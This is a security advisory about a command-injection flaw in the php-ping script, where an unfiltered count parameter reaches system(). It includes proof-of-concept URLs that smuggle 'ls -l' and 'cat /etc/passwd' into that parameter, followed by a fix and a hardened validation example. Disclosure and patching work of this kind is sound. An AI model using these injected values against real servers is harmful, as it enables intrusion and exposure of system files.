PHP-ping: Executing arbitrary commands
ppp-design found the following design error in
php-ping:
Details
-------
Product: php-ping
Affected Version: (no version information included in the script)
Immune Version: latest version
OS affected: all OS with php
Vendor-URL: http://www.theworldsend.net/
Vendor-Status: informed, new version available
Security-Risk: high - very high
Remote-Exploit: Yes
More details
------------
The problem is that not all user input is filtered correctly. Although
$host is filtered using preg_replace, the $count variable is passed
unfiltered to the system() command.
Proof-of-concept
----------------
You can use one of the following proof of concepts:
+http://www.example.com/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
+http://www.example.com/php-ping.php?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21
Temporary-Fix
-------------
Replace

    If ($count > $max_count)

with

    If ($count > $max_count || !is_numeric($count))

so that non-numeric values of $count take the same branch as values above
$max_count.
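A stricter form of the check above, as an added example (not php-ping's own code and not from the vendor): is_numeric() also accepts values such as "1e3" or "1.5", so this sketch validates $count as an integer in range and quotes $host before either reaches the shell. The function name safe_ping_command(), the default $max_count of 10, the Unix-style "ping -c" invocation and PHP 7.1 or later are assumptions.

```php
<?php
// Added example, not php-ping's code. safe_ping_command() and the
// $max_count default of 10 are hypothetical, chosen for illustration.

function safe_ping_command(string $host, string $count, int $max_count = 10): ?string
{
    // Accept only a plain integer in 1..$max_count; anything else is rejected.
    $n = filter_var($count, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => $max_count],
    ]);
    if ($n === false) {
        return null;
    }

    // Accept only an IP address or a syntactically valid hostname.
    // Hostname labels must start with an alphanumeric character, so a
    // value beginning with "-" cannot be read by ping as an option.
    $is_ip   = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $is_name = filter_var($host, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false;
    if (!$is_ip && !$is_name) {
        return null;
    }

    // $n is an int here; the host is still quoted so the shell sees
    // exactly one argument regardless of its content.
    return sprintf('ping -c %d %s', $n, escapeshellarg($host));
}

// Constructed inputs. The second is the URL-decoded count value from the
// first proof of concept above; the others probe the edges of the check.
$samples = ['3', '1 & ls -l &', '1e3', '99', ''];
foreach ($samples as $count) {
    $cmd = safe_ping_command('www.example.com', $count);
    printf("%-16s => %s\n", var_export($count, true), $cmd ?? 'rejected');
}
```

The returned string is what would be handed to system(); a null return means the request should be refused before any command is built.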